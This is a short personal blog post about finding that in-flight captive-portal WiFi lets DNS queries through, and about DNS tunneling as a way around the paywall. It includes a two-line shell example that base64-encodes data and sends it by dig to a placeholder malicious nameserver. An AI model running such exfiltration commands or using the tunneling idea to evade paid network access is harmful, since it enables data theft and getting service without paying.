Using DNS to bypass hotspot WiFi
──────────────────────────────────────────────────────────────────────

I took the plane yesterday, and realized that some companies now « 
offer » a free wifi service on-board, so you can access the internet 
while flying. They don't really offer anything though, as you must 
register your email address on a captive portal, and even pay a fee to 
get full internet access (instead of just « messaging apps »).

I tried to access the internet using curl(1) directly, to see if you 
could use protocols like gopher, or even smtp without registering. 
Turns out you can't.
However, I noticed that I could resolve all the hostnames I wanted ! 
Which means DNS request reach the internet without needing you to 
register on the portal. It immediately reminded me a technique I read 
about in the past, and forgot: DNS tunneling.

DNS tunneling is usually used as a data exfiltration method in cybrr 
attack. It assumes DNS traffic goes to the internet unfiltered, so a 
malware can use DNS queries to export data to an external server. For 
example:

    pl=$(echo "hidden data" | base64)
    dig +short TXT $pl @gimmedata.ns1.malicious.tld

The data can then be retrieved from the logs, or a modified DNS server 
could even reconstruct it. This is bad though, and you shouldn't do it.

However, abusing the DNS payload to send data over the internet is an 
interesting idea. Instead of exfiltrating data, you could use the 
remote DNS as a proxy or VPN, and access the clearnet by wrapping all 
your outgoing traffic in DNS queries, that would be replayed by the 
external server, and responded via DNS replies !

It could work i  theory, but has 2 major downsides: first, it would be 
horribly slow. The DNS payload is limited to something like 512 bytes, 
so that means fragmenting your traffic so it fits in a DNS request. 
Same for replies.
The second drawback is that it generates a lot of DNS traffic, 
potentially marking you as an attacker in the network you're trying to 
bypass, which could lead to problems.

I though it was a fun idea to explore, and I wonder if such a proxying 
method has been tested already ?

Having such a DNS web proxy in your toolbox could be pretty helpful 
from time to time ! 
-- 
~wgs
20200926.1342